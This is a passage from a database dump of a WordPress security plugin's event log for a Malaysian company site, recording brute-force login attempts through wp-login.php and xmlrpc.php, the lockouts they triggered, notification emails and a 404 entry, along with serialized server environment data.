7:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX-ZLfBTP0kPOVnb8jpDgAAAEc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062756.7076\";s:12:\"REQUEST_TIME\";s:10:\"1569062756\";}}','notice','2019-09-21 10:45:58','2019-09-21 10:45:57',17797000,19287184,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.28.52.13'),(25294,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:44:43\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:44:43\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:59:43\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:59:43\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:44:44','2019-09-21 10:44:43',17884240,19289808,'https://bintara.com.my/test/wp-login.php',1,0,'51.15.189.102'),(25295,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:44:44','2019-09-21 10:44:43',18090008,19289808,'https://bintara.com.my/test/wp-login.php',1,0,'51.15.189.102'),(25296,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/test/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX-HXkXpgmG5P@iB8kK1wAAAIU\";s:12:\"REDIRECT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"51.15.189.102\";s:11:\"REMOTE_PORT\";s:5:\"35033\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX-HXkXpgmG5P@iB8kK1wAAAIU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062685.6143\";s:12:\"REQUEST_TIME\";s:10:\"1569062685\";}}','notice','2019-09-21 10:44:47','2019-09-21 10:44:46',18314632,19611160,'https://bintara.com.my/test/xmlrpc.php',1,0,'51.15.189.102'),(25293,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX-GjDrcQxTmGrCWuaIIAAAAcM\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"51.15.189.102\";s:11:\"REMOTE_PORT\";s:5:\"34808\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX-GjDrcQxTmGrCWuaIIAAAAcM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062682.6099\";s:12:\"REQUEST_TIME\";s:10:\"1569062682\";}}','notice','2019-09-21 10:44:44','2019-09-21 10:44:43',17799368,19289808,'https://bintara.com.my/test/wp-login.php',1,0,'51.15.189.102'),(25290,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:44:00\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:44:00\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:59:00\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:59:00\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:44:01','2019-09-21 10:44:00',17887216,19289000,'https://bintara.com.my/wordpress/wp-login.php',1,0,'178.62.155.249'),(25291,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:44:01','2019-09-21 10:44:00',18092912,19289000,'https://bintara.com.my/wordpress/wp-login.php',1,0,'178.62.155.249'),(25292,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX@8nkXpgmG5P@iB8kKlQAAAIo\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"178.62.155.249\";s:11:\"REMOTE_PORT\";s:5:\"39797\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX@8nkXpgmG5P@iB8kKlQAAAIo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062642.5796\";s:12:\"REQUEST_TIME\";s:10:\"1569062642\";}}','notice','2019-09-21 10:44:03','2019-09-21 10:44:02',18313560,19609504,'https://bintara.com.my/wordpress/xmlrpc.php',1,0,'178.62.155.249'),(25289,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX@73kXpgmG5P@iB8kKkQAAAIk\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"178.62.155.249\";s:11:\"REMOTE_PORT\";s:5:\"39480\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX@73kXpgmG5P@iB8kKkQAAAIk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062639.9726\";s:12:\"REQUEST_TIME\";s:10:\"1569062639\";}}','notice','2019-09-21 10:44:01','2019-09-21 10:44:00',17803048,19289000,'https://bintara.com.my/wordpress/wp-login.php',1,0,'178.62.155.249'),(27781,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:84:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1570619985.7199440002441406250000\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1570619985.7199440002441406250000\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1570619985.7199440002441406250000\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:180:\"/usr/local/jdk/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/usr/X11R6/bin:/root/bin:/opt/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1570619985.7199440002441406250000\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"52892\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1570619985.7199440002441406250000\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ3CUQdB7FBR0bQuaTu2GgAAABg\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ3CUQdB7FBR0bQuaTu2GgAAABg\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"52892\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ3CUQdB7FBR0bQuaTu2GgAAABg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570620895.3565\";s:12:\"REQUEST_TIME\";s:10:\"1570620895\";}}','notice','2019-10-09 11:35:13','2019-10-09 11:34:56',35074072,35325952,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1570619985.7199440002441406250000',1,0,'103.6.198.69'),(25629,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:32:08\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:32:08\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:47:08\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:47:08\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:32:09','2019-09-21 11:32:08',17884696,19289968,'https://bintara.com.my/2019/wp-login.php',1,0,'213.202.100.9'),(25630,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:32:09','2019-09-21 11:32:08',18090376,19289968,'https://bintara.com.my/2019/wp-login.php',1,0,'213.202.100.9'),(25631,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 